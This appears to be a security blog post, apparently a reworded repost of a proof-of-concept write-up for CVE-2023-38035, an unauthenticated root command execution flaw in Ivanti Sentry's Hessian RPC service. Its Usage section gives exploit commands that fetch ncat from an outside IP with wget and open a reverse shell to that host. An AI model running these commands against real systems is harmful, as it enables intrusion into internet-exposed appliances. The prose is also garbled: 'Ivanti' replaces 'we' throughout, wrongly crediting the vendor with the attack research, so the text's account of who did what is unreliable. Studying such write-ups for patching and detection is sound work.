Cyber security

CVE-2023-38035 – Arbitrary Command Execution As The Root user On Ivanti Sentry

Ivanti has just put out a warning about CVE-2023-38035. The vulnerability has been added to CISA KEV and is called an authentication bypass in the Ivanti Sentry user interface.

This new flaw comes after a flaw in Ivanti EPMM (CVE-2023-35078) that was already being used in the wild. In this post, we’ll look closely at how this new flaw can be used to let an attacker run code as the root user from afar. Here is where you can find our POC.

Patch Diffing

The advice has rpm files that we can use to fix versions of Ivanti Sentry that are supported. We look at what’s in these files with the tool rpm2cpio to get a better idea of how the patch works.

Ivanti find two more rpm files, one called mi-mics and the other mi-system-scripts. Let’s look at what’s in the mi-mics rpm.

Hessian RPC

Let’s take a step back and figure out how these functions are meant to be called. We know from the advisory that this should be an HTTP vulnerability, but these functions don’t look like normal HTTP endpoints.

If Ivanti look at the file remoting-servlet.xml from earlier, Ivanti can see that this service refers to a class called SentryMicsHessianServiceExporter.

Ivanti had never heard of Hessian before, but after looking it up on the internet, it seems to be a type of binary/XML RPC. The link is: http://hessian.caucho.com/doc/

Ivanti can try to connect this service by using the python-hessian package.

Here, Ivanti can see that calling methods from this service is pretty easy. The only thing that makes things harder is that it doesn’t seem to be easy to turn off SSL certificate checks. To get around this, we change the way python-hessian uses HTTPS Connection.

Technical Analysis

A technical root cause analysis of the vulnerability can be found on Ivanti blog

Usage

python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Mitigations

Update to the latest version according to the instructions within the Ivanti Advisory

Follow The Horizon3.ai Attack Team On Twitter For The Latest Security Research:

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Summary

Ivanti were able to use an exposed endpoint to run arbitrary tasks without needing to log in. Shodan shows that this product can be found on the internet more than 500 times.

Ivanti suggest that people who use this product and are affected put the patch for their version on and make sure it isn’t open to the internet if they can.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

Xenon : A New Tool In The Mythic Framework

Xenon is a Windows agent designed for the Mythic framework, inspired by tools like Cobalt…

11 hours ago

OSCP : Navigating The Essential Toolkit For Penetration Testing

The OSCP (Offensive Security Certified Professional) certification is a highly respected credential in the cybersecurity…

11 hours ago

Famatech Advanced IP Scanner Or Advanced Port Scanner Usage

Famatech offers two powerful network management tools: Advanced IP Scanner and Advanced Port Scanner. Both…

11 hours ago

ELF Loader And PS5-JAR-Loader : Tools For Enhanced Functionality

In the realm of PlayStation 5 (PS5) development, two significant tools have emerged to enhance…

11 hours ago

C2IntelFeeds : Enhancing Cybersecurity With Threat Intelligence

C2IntelFeeds is a powerful tool designed to provide actionable threat intelligence to cybersecurity professionals. It…

13 hours ago

goLAPS : The Ultimate Guide To Managing LAPS Passwords with Golang

goLAPS is a tool designed to interact with the Local Administrator Password Solution (LAPS) in…

15 hours ago